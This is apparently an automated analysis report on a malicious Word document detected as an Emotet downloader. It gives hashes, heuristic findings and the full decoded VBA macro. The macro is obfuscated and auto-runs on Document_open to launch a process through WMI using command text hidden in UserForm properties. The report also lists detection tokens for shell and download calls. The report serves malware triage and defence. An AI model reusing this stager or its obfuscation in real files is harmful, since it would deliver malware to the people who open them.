Office (OLE) malware analysis — malicious · 7e248c93cd7014fc

MALICIOUS

Office (OLE)

180.7 KB Created: 2019-12-13 11:46:00 Authoring application: Microsoft Office Word First seen: 2021-02-23

MD5: 4677cd6a7f06bdc1c246c2ba73394721 SHA-1: 77d3cc24e171473eb1a32e12107b88c2aa0c4fb9 SHA-256: 7e248c93cd7014fc9f4ce9cd49b64bf3bf1432fde8e279029da76d788ddba82b

232 Risk Score

Heuristics 8

ClamAV: Doc.Downloader.Emotet-7451718-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7451718-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess"
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9594 bytes
SHA-256: `6b1a61b17f2458a95e99ebfa01594acc21a98a51aeef5b057d91e6f0be23d0c1`
Detection ClamAV: No threats found Obfuscation or payload: likely 162 of 252 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sjzwtzgavjuc" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Vsvjzgyjrzdav, 0, 0, MSForms, TextBox" Private Sub Document_open() Select _ Case Gkhfokxr Case 632 Bsbcklhm _ = Cos _ (331) Esbshmrwvmvh = Atn(130) Iicezihbzehr _ = Cos(51) Case 689 Ydbmikynj = Atn(917) Ctavwhuzgubic _ = 669 Ldtwlqwlxrk = CDate _ (977) Case 924 Hwuznhwpgfdwn = _ CInt(457) Lwvyytyuum = Log(Ghdelyvsk) Uvqyfyqa = Naawljeibankz End Select Select _ Case Dgtgibcb Case 311 Ueyeprfg _ = Cos _ (998) Ehavswjiqj = Atn(944) Qqwaqsbbq _ = Cos(248) Case 67 Qsdvaoxaz = Atn(995) Wvfxnmrtk _ = 903 Onhipameutjck = CDate _ (763) Case 743 Aiutjczmtau = _ CInt(729) Ojwkhqdqo = Log(Wnullmsuuymjz) Xpbnhuhhqlx = Uzymqwxvhnbh End Select Select _ Case Neefbyyurskb Case 692 Zyloasqlsko _ = Cos _ (819) Xbgxmajcjjd = Atn(279) Luxvzkrz _ = Cos(920) Case 522 Bzvndbmuqdh = Atn(338) Lvxaclqohuzg _ = 209 Xkegrinexrn = CDate _ (37) Case 759 Xpmqtkbl = _ CInt(127) Jooyzufw = Log(Nojlxqsfg) Nwktzudfw = Xhurdjnk End Select Splhxibnp End Sub Attribute VB_Name = "Fodxhwzmz" Attribute VB_Base = "0{18D9CF1A-F049-41BC-B873-4DBFCF6E4700}{00BE8A41-D2CD-45B3-9031-16D908976C67}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Bmuopqew" Function Xgtumzclb() Select _ Case Iotsqkvlv Case 727 Yyifsiggxqr _ = Cos _ (295) Wmrhcdyyhgh = Atn(184) Dqvwcjwzxsj _ = Cos(644) Case 168 Wzesprudwesn = Atn(19) Vorrazffplan _ = 944 Qythgihyuorql = CDate _ (484) Case 711 Lcjtsbkgb = _ CInt(690) Oqjsrbjx = Log(Kkgakwtcakowy) Rupwfssyf = Pcxpgnvibsc End Select Ykboaqazck = Sjzwtzgavjuc.Vsvjzgyjrzdav Select _ Case Qocfhjwgylcz Case 135 Ljutfszzsmcy _ = Cos _ (363) Jjzqspcexga = Atn(896) Rbwbsjrbkpska _ = Cos(54) Case 649 Vqdidhwomlg = Atn(817) Hlotiuixvljo _ = 751 Ztgfruligcr = CDate _ (634) Case 952 Unjpmvyuybz = _ CInt(492) Mtafuuptx = Log(Fothzelbp) Klvxtqtasge = Shbixdyxt End Select Xbanklpccm = Ykboaqazck + Fodxhwzmz.Mfzwggep + Fodxhwzmz.Rxisphkvcbj + Fodxhwzmz.Ffirrcbek Select _ Case Efbwurnmq Case 475 Qovpndyk _ = Cos _ (95) Xzowgexntq = Atn(555) Asqhdgymguia _ = Cos(41) Case 128 Qbteiejuhf = Atn(562) Nmqyxvhyndygz _ = 15 Ddcrnixovu = CDate _ (982) Case 2 Oifkkudsm = _ CInt(523) Xntpvndnf = Log(Greozrqxvein) Isnmwzahvfe = Bbsgjrvcofwu End Select Vcsphyutxg = Xbanklpccm + Fodxhwzmz.Gdfedqumrahz + Fodxhwzmz.Adcynifadjy.ControlTipText Select _ Case Uzdwafwkq Case 999 Iiodxnqjh _ = Cos _ (939) Auidlmkpgipz = Atn(979) Xvypxykizsn _ = Cos(811) Case 938 Kzlpmcayjnx = Atn(340) Aarxtjinas _ = 696 Jfjsuqqrwaqv = CDate _ (283) Case 180 Xeqohavn = _ CInt(894) Rczelcjhtv = Log(Rgoxgcnzkweqm) Mlqywgzarrmgu = Bxaznjzjut End Select Xgtumzclb = Nmomhxzxr + Vcsphyutxg + Nmomhxzxr Select _ Case Bfcpoizjssgl Case 620 Dyfazdzk _ = Cos _ (327) Xcugzwjktp = Atn(133) Bilpegvdakcr _ = Cos(614) Case 658 Swhltqbssm = Atn(556) Kvjvrlniwwok _ = 904 Paimzdzmemci = CDate _ (77) Case 399 Tjqyblvzuesre = _ CInt(778) Whxlzaakfnk = Log(Rwsjpopngqiox) Duhycvhff = Yszklrtxhxlic End Select End Function Function Splhxibnp() Select _ Case Cuwsmnfzdcflf Case 949 Hlynuxlk _ = Cos _ (444) Qiujguphuabsg = Atn(205) Pwwjmtfari _ = Cos(231) Case 365 Uizrjluwfk = Atn(385) Hqdkbapfkbebo _ = 387 Ekhcbwluzvjsg = CDate _ (299) Case 894 Gegzbvpuyrte = _ CInt(135) Dydinqlxioav = Log(Pshjurvz) Zdopjlismbw = Ksvgiwsyg End Select Zmfpzzehhgbff = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Sjzwtzgavjuc.Vsvjzgyjrzdav + "rocess" Select _ Case Pexhtsssmc Case 18 Kefqrmnnzqmfw _ = Cos _ (244) Lasfyobfccwxx = Atn(563) Jekchzkh _ = Cos(242) Case 336 Lkjzsrlbwgs = Atn(641) Vjjycovpqfxgh _ = 589 Lwbsoqnergkk = CDate _ (986) Case 200 Bbjqhptybitjy = _ CInt(228) Mslxsqzez = Log(Iessrejtp) Qafzmvtzesr = Nznsfbwkl End Select Set Jntjvyppzzc = CreateObject(Null & Zmfpzzehhgbff) Select _ Case Tjkmdcsffbsq Case 385 Fliucrgbtb _ = Cos _ (915) Igjiffyglvwha = Atn(568) Elwbddawbaiif _ = Cos(642) Case 362 Pjiftlwwwnse = Atn(738) Paujrbpxza _ = 68 Khiwwsrsfn = CDate _ (817) Case 931 Anioaolzbmmz = _ CInt(738) Nmcsjilkboozq = Log(Fdcbzietbx) Vhxviixeepn = Jpltzaylmwi End Select Vtvqkylc = Zmfpzzehhgbff + Fodxhwzmz.Rwtxaphjyf.ControlTipText + Fodxhwzmz.Hmevofwpu.ControlTipText Select _ Case Lsriftrydqgts Case 657 Ecorhxdd _ = Cos _ (178) Nfzgimrh = Atn(937) Puvxdizr _ = Cos(283) Case 681 Yvhrdkfbkaiow = Atn(6) Orsueomiknkg _ = 640 Yymlwfsxidx = CDate _ (451) Case 791 Wjtaxqfprgw = _ CInt(542) Lmweteonmb = Log(Azaqjpwx) Yrmnplyhrpx = Fbektscjixxw End Select Wxszvkzmqhdba = Vtvqkylc + Sjzwtzgavjuc.Vsvjzgyjrzdav Select _ Case Ltnkoouyan Case 76 Uefrjmyxfmff _ = Cos _ (815) Cxxfxzdcv = Atn(944) Imktlaefd _ = Cos(504) Case 496 Szpauxfzoi = Atn(297) Lwavqzqsj _ = 309 Azndulazcu = CDate _ (533) Case 11 Yqwfgxvww = _ CInt(693) Yxkfogmvz = Log(Obgtknoidm) Ceuukunyqxu = Jfmspyuhl End Select Set Splhxibnp = CreateObject(Wxszvkzmqhdba) Select _ Case Bbrjowvgkek Case 873 Eifxoigdzwqmy _ = Cos _ (456) Wwomouurhk = Atn(903) Wzyojejhq _ = Cos(33) Case 161 Urjlcebxqi = Atn(323) Nqxkfkryml _ = 64 Ebhghpgwzl = CDate _ (423) Case 595 Firmfmmznpkym = _ CInt(268) Xyyyjqzh = Log(Uqbbmkcwbewsf) Zbwoqitn = Xamkfgaqok End Select Splhxibnp.XSize = False * False Select _ Case Qyirzjrpsthta Case 464 Rdguabtrqkoae _ = Cos _ (331) Jwwfmymf = Atn(879) Rnpywspjrliza _ = Cos(995) Case 260 Xgsgljmapkkwu = Atn(569) Exvwjnettrzrn _ = 288 Kvjkoruyzpem = CDate _ (637) Case 743 Lwutrhldeeh = _ CInt(285) Yplszxuzpnk = Log(Kyvhebefh) Xvwjgrecw = Jowepfowikskw End Select Splhxibnp.YSize = False * False Select _ Case Ajtlglezw Case 381 Qcaxbdzwjts _ = Cos _ (216) Zqloyuzlfyiph = Atn(934) Nbxqqazbqcve _ = Cos(103) Case 682 Hohqwlpzq = Atn(914) Wekdriug _ = 104 Iwccwapvld = CDate _ (133) Case 268 Hyjayllenkvo = _ CInt(418) Pxyubxzvysfn = Log(Adexlcxmtr) Vbvyaniaks = Csulzrvllze End Select Do While Jntjvyppzzc.Create(Null & Xgtumzclb, Aeefqcdyjukof, Splhxibnp) Loop Select _ Case Grsnftpk Case 269 Qjysrgcnkrgzl _ = Cos _ (950) Uvkiyghrdhdzf = Atn(731) Wsncytsytry _ = Cos(396) Case 77 Hvggsokxfby = Atn(628) Sulngxcwv _ = 492 Ibfbxqramr = CDate _ (809) Case 538 Axhrzqrrp = _ CInt(561) Bxnflbruliu = Log(Jjaojxerinl) Gdfewxwleeklg = Wxzfarhqqdhr End Select End Function

Open this report in the interactive analyzer, or submit your own file for analysis.